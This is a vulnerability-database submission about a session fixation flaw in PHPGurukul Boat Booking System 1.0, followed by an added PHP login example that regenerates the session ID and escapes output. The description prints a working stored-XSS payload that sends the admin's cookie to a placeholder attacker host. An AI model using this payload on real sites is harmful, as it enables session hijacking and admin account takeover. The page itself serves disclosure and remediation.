
Submit #425414: PHPGurukul Boat Booking System 1.0 Session Fixation

Title: PHPGurukul Boat Booking System 1.0 Session Fixation
Description: The session is being started (session_start()) without regenerating the session ID after login, which could expose the system to session fixation attacks. An attacker can force a session ID onto a victim and then hijack it after the victim logs in. Risk: If an attacker gets hold of the session ID (via XSS or other means), they could hijack the session and impersonate the user. Fix: After logging in, regenerate the session ID to prevent this attack. By injecting the `<script>var i=new Image(); i.src="http://x.x.x.x:1234/?cookie="+btoa(document.cookie);</script>` payload into forms in book-boat.php, an attacker can inject an XSS payload. When the admin user signs in to check all-booking.php, the payload is triggered and the admin cookie is forwarded to the attacker's netcat listener, which can be used to log in as the admin user without needing any credentials.
Source: https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_session_fixation.md
User: jadu101 (UID 70632)
Submission: 17.10.2024 06:12 (5 months ago)
Moderation: 18.10.2024 21:17 (2 days later)
Status: Accepted
VulDB Entry: 280944 [PHPGurukul Boat Booking System 1.0 session_start weak authentication]
Points: 20
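As an added illustration of the fix the description calls for, the following PHP login handler regenerates the session ID once authentication succeeds and escapes booking data on output so a stored payload renders as inert text. This is example code written for this page, not code from PHPGurukul or from the submitter; the table and column names, the `$pdo` connection, and the form field names are assumptions.

```php
<?php
// Added example, not PHPGurukul code. Table/column names, $pdo and the
// login form field names are assumptions made for illustration.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,   // document.cookie cannot read the session cookie
    'cookie_secure'   => true,   // cookie is only sent over HTTPS
    'cookie_samesite' => 'Lax',
    'use_strict_mode' => true,   // reject session IDs the server never issued
]);

/**
 * Verify credentials and, on success, issue a fresh session ID.
 * Returns true when the user is now logged in.
 */
function login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM admin WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }

    // The fix from the report: discard whatever session ID existed before
    // login (an attacker-planted one included) and delete the old session
    // data so the pre-login ID no longer maps to anything.
    session_regenerate_id(true);
    $_SESSION['admin_id'] = (int) $row['id'];
    return true;
}

/** Encode a value for safe insertion into HTML text or attributes. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Usage on the listing page (assumed booking row structure):
// echo '<td>' . e($booking['name']) . '</td>';
```

`session_regenerate_id(true)` addresses the fixation issue the entry describes; the `HttpOnly` flag and output encoding are complementary, since the report's scenario relies on a stored script reading `document.cookie` on the admin's listing page.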
